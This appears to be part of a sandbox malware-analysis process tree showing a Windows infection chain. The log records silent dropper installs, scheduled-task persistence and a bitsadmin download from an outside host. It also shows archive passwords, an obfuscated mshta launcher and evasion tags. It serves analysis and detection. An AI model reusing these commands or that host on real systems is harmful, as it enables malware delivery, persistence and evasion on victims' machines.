C:\Users\Admin\AppData\Local\Temp\ee-2a830-a09-7bfbd-e78e64917a91b\Juvekigate.exe
"C:\Users\Admin\AppData\Local\Temp\ee-2a830-a09-7bfbd-e78e64917a91b\Juvekigate.exe"
12⤵
PID:1444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exe /eufive & exit
13⤵
PID:7272

C:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exe /eufive
14⤵
PID:10092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10092 -s 236
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:9988

C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe
C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe /qn CAMPAIGN="654"
14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:3236

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635544059 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
15⤵
- Enumerates connected drives
PID:9308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe & exit
13⤵
PID:10060

C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe
C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe
14⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe
"C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe" -u
15⤵
PID:6632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exe /mixfive & exit
13⤵
PID:10128

C:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exe /mixfive
14⤵
PID:6264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 236
15⤵
- Program crash
- Enumerates system info in registry
PID:7528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exe /S & exit
13⤵
PID:10192

C:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exe /S
14⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:6976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
- Loads dropped DLL
PID:1336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:4192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:8732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:5404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:7804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:9468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
- Checks for any installed AV software in registry
PID:9788

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
15⤵
- Download via BitsAdmin
PID:5664

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
- Drops file in Program Files directory
PID:6304

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:3032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:5940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:6952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:5252

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:5944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:3908

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
15⤵
PID:4188

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
16⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:6844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:7968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:7296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:6856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"
15⤵
PID:1796

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
15⤵
- Drops file in Program Files directory
PID:7784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exe /eufive & exit
13⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exe /eufive
14⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 236
15⤵
- Program crash
- Enumerates system info in registry
PID:8432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exe
C:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exe /qn CAMPAIGN="654"
14⤵
PID:8768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe & exit
13⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe
C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe
14⤵
PID:8968

C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe
"C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe" -u
15⤵
PID:8624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exe /mixfive & exit
13⤵
PID:1660

C:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exe /mixfive
14⤵
PID:6272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 236
15⤵
- Program crash
- Enumerates system info in registry
PID:2084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uavv3uan.kld\autosubplayer.exe /S & exit
13⤵
- Suspicious use of SetWindowsHookEx
PID:5888

C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe
"C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Enumerates system info in registry
PID:5812

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
10⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6112

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
11⤵
PID:5696

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee0
12⤵
PID:7268

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e90
13⤵
PID:7060

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,15229691010207326713,18239731444127179867,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5696_600834598" --mojo-platform-channel-handle=1764 /prefetch:8
12⤵
PID:7276

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:4624

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:6156

C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe
"C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"
7⤵
PID:5688

C:\Users\Admin\Pictures\Adobe Films\iYGd7u5Uk_Ib_3Gb94q_cYxs.exe
"C:\Users\Admin\Pictures\Adobe Films\iYGd7u5Uk_Ib_3Gb94q_cYxs.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5680

C:\Users\Admin\AppData\Local\Temp\cli.exe
"C:\Users\Admin\AppData\Local\Temp\cli.exe"
8⤵
- Suspicious behavior: SetClipboardViewer
PID:2964

C:\Users\Admin\Pictures\Adobe Films\bwkxPh1yL2Wkm1rmvTMe2VTO.exe
"C:\Users\Admin\Pictures\Adobe Films\bwkxPh1yL2Wkm1rmvTMe2VTO.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 1260
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:132

C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe
"C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5860

C:\Users\Admin\Pictures\Adobe Films\Y_p1ACnNV_8eXhUvQTx5FOX2.exe
"C:\Users\Admin\Pictures\Adobe Films\Y_p1ACnNV_8eXhUvQTx5FOX2.exe"
7⤵
PID:5836

C:\Users\Admin\Pictures\Adobe Films\1uT2d0BkeE_DJquEcpjI45YJ.exe
"C:\Users\Admin\Pictures\Adobe Films\1uT2d0BkeE_DJquEcpjI45YJ.exe"
7⤵
- Executes dropped EXE
PID:5828

C:\Users\Admin\Pictures\Adobe Films\q2NUgOj7NxZeJYYXzRNGaWUt.exe
"C:\Users\Admin\Pictures\Adobe Films\q2NUgOj7NxZeJYYXzRNGaWUt.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5820

C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe
"C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"
7⤵
PID:5812

C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe
"C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"
8⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 208
9⤵
- Program crash
PID:5608

C:\Users\Admin\Pictures\Adobe Films\FMTnjSf044j05Xl8dMd_dNnh.exe
"C:\Users\Admin\Pictures\Adobe Films\FMTnjSf044j05Xl8dMd_dNnh.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:2068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 400
8⤵
- Program crash
PID:7000

C:\Users\Admin\Pictures\Adobe Films\QFWlN69O9FNkcWfwdW6z88Ve.exe
"C:\Users\Admin\Pictures\Adobe Films\QFWlN69O9FNkcWfwdW6z88Ve.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5156

C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe
"C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"
7⤵
- Executes dropped EXE
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 240
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4452

C:\Users\Admin\Pictures\Adobe Films\E_OHOPUQK1p49G7oDJQPE6PW.exe
"C:\Users\Admin\Pictures\Adobe Films\E_OHOPUQK1p49G7oDJQPE6PW.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6140

C:\Users\Admin\Pictures\Adobe Films\f_qhca_mqGIJHx39G3hKWVKQ.exe
"C:\Users\Admin\Pictures\Adobe Films\f_qhca_mqGIJHx39G3hKWVKQ.exe"
7⤵
- Executes dropped EXE
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 280
8⤵
- Loads dropped DLL
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1240

C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe
"C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"
7⤵
PID:5368

C:\Users\Admin\Pictures\Adobe Films\iewmuvfYoeYocCWCwej2zCXy.exe
"C:\Users\Admin\Pictures\Adobe Films\iewmuvfYoeYocCWCwej2zCXy.exe"
7⤵
PID:5952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
5⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon173a360b525.exe
Mon173a360b525.exe
6⤵
- Executes dropped EXE
PID:932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
5⤵
PID:444

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe
Mon17bbf11fdb575d.exe
6⤵
- Executes dropped EXE
PID:5088

C:\Users\Admin\AppData\Local\Temp\is-MJ6MI.tmp\Mon17bbf11fdb575d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MJ6MI.tmp\Mon17bbf11fdb575d.tmp" /SL5="$2016C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2236

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe" /SILENT
8⤵
- Executes dropped EXE
PID:1980

C:\Users\Admin\AppData\Local\Temp\is-ON8NL.tmp\Mon17bbf11fdb575d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ON8NL.tmp\Mon17bbf11fdb575d.tmp" /SL5="$1021C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe" /SILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2148

C:\Users\Admin\AppData\Local\Temp\is-BKB4L.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-BKB4L.tmp\postback.exe" ss1
10⤵
- Executes dropped EXE
PID:5572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
5⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon179f74c0ff3cf1f.exe
Mon179f74c0ff3cf1f.exe
6⤵
- Executes dropped EXE
PID:4376

C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe
"C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"
7⤵
- Executes dropped EXE
PID:1732

C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe
"C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5848

C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe
"C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"
7⤵
- Executes dropped EXE
PID:5804

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:5464

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:7084

C:\Users\Admin\Documents\0jXluebhN_4bn2qf28JNKLOw.exe
"C:\Users\Admin\Documents\0jXluebhN_4bn2qf28JNKLOw.exe"
8⤵
PID:6392

C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe
"C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"
9⤵
PID:6228

C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe
"C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"
9⤵
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 272
10⤵
- Program crash
PID:3024

C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe
"C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"
9⤵
PID:400

C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe
"C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"
9⤵
PID:3136

C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe
"C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"
9⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 1780
10⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6208

C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe
"C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"
9⤵
PID:4700

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
10⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ) do taskkill -f -iM "%~NxM"
11⤵
PID:6476

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "i8hX2rb2gYWCXaUEOy3W51c_.exe"
12⤵
- Kills process with taskkill
PID:772

C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe
"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"
9⤵
PID:6636

C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe
"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe" -u
10⤵
PID:5380

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Executes dropped EXE
PID:5688

C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe
"C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"
9⤵
- Loads dropped DLL
PID:1368

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
10⤵
- Loads dropped DLL
- Adds Run key to start application
PID:2992

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
11⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:8576

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee0
12⤵
PID:3340

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e90
13⤵
PID:4084

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
